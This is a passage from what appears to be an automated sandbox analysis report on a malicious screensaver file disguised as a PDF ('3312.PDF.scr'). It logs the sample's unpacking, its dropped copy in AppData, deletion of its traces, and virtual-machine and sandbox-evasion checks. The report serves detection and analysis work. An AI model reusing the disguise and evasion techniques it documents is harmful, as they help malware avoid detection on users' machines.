    Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\3312.PDF.scrFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\3312.PDF.scrUnpacked PE file: 0.2.3312.PDF.scr.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\djjergwUnpacked PE file: 5.2.djjergw.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_0040237B push 000023C2h; retn 0023h0_2_0040238B
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_004025DC push ebp; ret 0_2_004025FC
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00401284 pushad ; iretd 0_2_00401286
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_006A2643 push ebp; ret 0_2_006A2663
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_006A12EB pushad ; iretd 0_2_006A12ED
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_006A23E2 push 000023C2h; retn 0023h0_2_006A23F2
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_0082D88C push eax; retf 0_2_0082D88D
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00831297 pushad ; iretd 0_2_00831299
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00832DBC push es; retf 0_2_00832DD3
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00837ACF push esp; ret 0_2_00837AD0
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_008344EC push ebx; ret 0_2_008344EF
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0040237B push 000023C2h; retn 0023h5_2_0040238B
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_004025DC push ebp; ret 5_2_004025FC
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00401284 pushad ; iretd 5_2_00401286
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_005E2643 push ebp; ret 5_2_005E2663
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_005E12EB pushad ; iretd 5_2_005E12ED
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_005E23E2 push 000023C2h; retn 0023h5_2_005E23F2
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0061306C push es; retf 5_2_00613083
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00617D7F push esp; ret 5_2_00617D80
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00611547 pushad ; iretd 5_2_00611549
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0060D7FC push eax; ret 5_2_0060D7FD
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_0061479C push ebx; ret 5_2_0061479F
    Source: 3312.PDF.scrStatic PE information: section name: .text entropy: 7.486122419985256
    Source: djjergw.1.drStatic PE information: section name: .text entropy: 7.486122419985256
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\djjergwJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\djjergwJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\3312.pdf.scrJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\djjergw:Zone.Identifier read attributes | deleteJump to behavior
    Source: Possible double extension: pdf.scrStatic PE information: 3312.PDF.scr
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\3312.PDF.scrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\djjergwEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_5-4137
    Source: C:\Users\user\Desktop\3312.PDF.scrEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_0-4046
    Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\Desktop\3312.PDF.scrAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\djjergwAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\djjergwAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: djjergw, 00000005.00000002.2038222730.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 377Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3037Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 735Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1517Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 875Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 494Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 470Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3752Thread sleep count: 377 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3992Thread sleep count: 3037 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3992Thread sleep time: -303700s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2056Thread sleep count: 735 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2056Thread sleep time: -73500s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2004Thread sleep count: 281 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2932Thread sleep count: 269 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 1892Thread sleep count: 346 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 1892Thread sleep time: -34600s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3992Thread sleep count: 1517 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3992Thread sleep time: -151700s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\3312.PDF.scrCode function: 0_2_00418730 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418971h0_2_00418730
    Source: C:\Users\user\AppData\Roaming\djjergwCode function: 5_2_00418730 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418971h5_2_00418730
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: explorer.exe, 0000000A.00000003.2731692731.000000000B7BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000001.00000000.1743944804.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1743944804.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2725520938.0000000008DD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008DD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2905935716.0000000008D93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2705554465.0000000008D93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2718077768.0000000008DD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008DD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2704520251.0000000008D93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2703383894.0000000008D93000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2711340708.0000000008D93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 0000000A.00000003.2703285048.0000000008DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000IO
    Source: explorer.exe, 0000000A.00000003.2772623817.000000000B73D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}xe@
    Source: explorer.exe, 0000000A.00000002.2898393777.0000000000DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\v
    Source: explorer.exe, 0000000A.00000003.2731692731.000000000B7BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_0
    Source: explorer.exe, 0000000A.00000002.2905935716.0000000008D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
    Source: explorer.exe, 0000000A.00000003.2749269947.000000000B7ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
    Source: explorer.exe, 0000000A.00000003.2791404151.000000000B772000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 00000001.00000000.1742331928.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\xe=
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\xe
    Source: explorer.exe, 00000001.00000000.1743944804.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}xe
    Source: explorer.exe, 0000000A.00000003.2792005844.000000000B7EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
    Source: explorer.exe, 00000001.00000000.1742331928.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
    Source: explorer.exe, 0000000A.00000003.2745342068.000000000B84E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}exeP
    Source: explorer.exe, 00000001.00000000.1743944804.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
    Source: explorer.exe, 0000000A.00000003.2792005844.000000000B7EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000001.00000000.1740976335.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000003.2703285048.0000000008DAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oneNECVMWar VMware SATA CD00eswindir=C:\Windol&
    Source: explorer.exe, 00000001.00000000.1744477786.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
    Source: explorer.exe, 00000001.00000000.1740976335.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
    Source: explorer.exe, 0000000A.00000002.2905935716.0000000008D46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 0000000A.00000003.2731692731.000000000B7BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000D&
    Source: explorer.exe, 0000000A.00000003.2792005844.000000000B7EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}exe
    Source: explorer.exe, 0000000A.00000002.2901365364.00000000047FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Countercss.dll+0x191e6
    Source: explorer.exe, 0000000A.00000003.2772623817.000000000B73D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000M
    Source: explorer.exe, 0000000A.00000003.2757395584.000000000B84D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
